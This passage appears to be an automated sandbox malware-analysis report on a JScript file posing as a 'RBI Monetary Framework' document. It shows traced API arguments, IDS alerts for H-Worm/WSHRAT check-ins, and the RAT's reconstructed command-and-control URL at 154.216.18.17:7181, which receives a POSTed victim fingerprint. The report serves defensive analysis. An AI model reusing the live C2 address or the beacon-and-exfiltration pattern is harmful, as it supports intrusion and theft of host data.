    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsReturn value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsReturn value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: RBI-MontaryFramework.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49954 -> 154.216.18.17:7181
    Source: Network trafficSuricata IDS: 2017994 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA : 192.168.2.4:49954 -> 154.216.18.17:7181
    Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:50006 -> 154.216.18.17:7181
    Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:50005 -> 154.216.18.17:7181
    Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:50004 -> 154.216.18.17:7181
    Source: Network trafficSuricata IDS: 2017994 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA : 192.168.2.4:50006 -> 154.216.18.17:7181
    Source: Network trafficSuricata IDS: 2017994 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA : 192.168.2.4:50005 -> 154.216.18.17:7181
    Source: Network trafficSuricata IDS: 2017994 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA : 192.168.2.4:50004 -> 154.216.18.17:7181
    Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:50007 -> 154.216.18.17:7181
    Source: Network trafficSuricata IDS: 2017994 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA : 192.168.2.4:50007 -> 154.216.18.17:7181
    Source: C:\Windows\System32\wscript.exeNetwork Connect: 154.216.18.17 7181Jump to behavior
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['"MSXML2.XMLHTTP"', '"MSXML2.XMLHTTP",""']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['"site-send",""', '"site-send"']
    Source: RBI-MontaryFramework.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsReturn value : ['"user-agent:"']
    Source: RBI-MontaryFramework.jsReturn value : ['"user-agent:"']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsReturn value : ['"user-agent:"']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['"msxml2.xmlhttp",""', '"msxml2.xmlhttp"']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsReturn value : ['"user-agent:",""', '"user-agent"', '"user-agent:"']
    Source: RBI-MontaryFramework.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsReturn value : ['"is-sending",""', '"is-sendin"', '"is-sending"', '"is-sendi","n"', '"is-send"']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['"send",""', '"send"']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsReturn value : ['"http://154.216.18.17:"', '"http://154.216.18.17:7181/"', '"http://154.216.18.17:7181"', '"http://"', '"http://",""', '"http://154.216.18.17:7181/","is-ready"', '"http://","154.216.18.17"', '"http://154.216.18.17"', '"http://154.216.18.17",":"', '"http://154.216.18.17:",7181', '"POST","http://154.216.18.17:7181/is-ready",false', '"http://154.216.18.17:7181/is-ready"', '"http://154.216.18.17:7181","/"']
    Source: RBI-MontaryFramework.jsReturn value : ['"user-agent:"', '"user-agent:","B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: RBI-MontaryFramework.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 7181
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 7181
    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 7181
    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 7181
    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 7181
    Source: global trafficTCP traffic: 192.168.2.4:49954 -> 154.216.18.17:7181
    Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
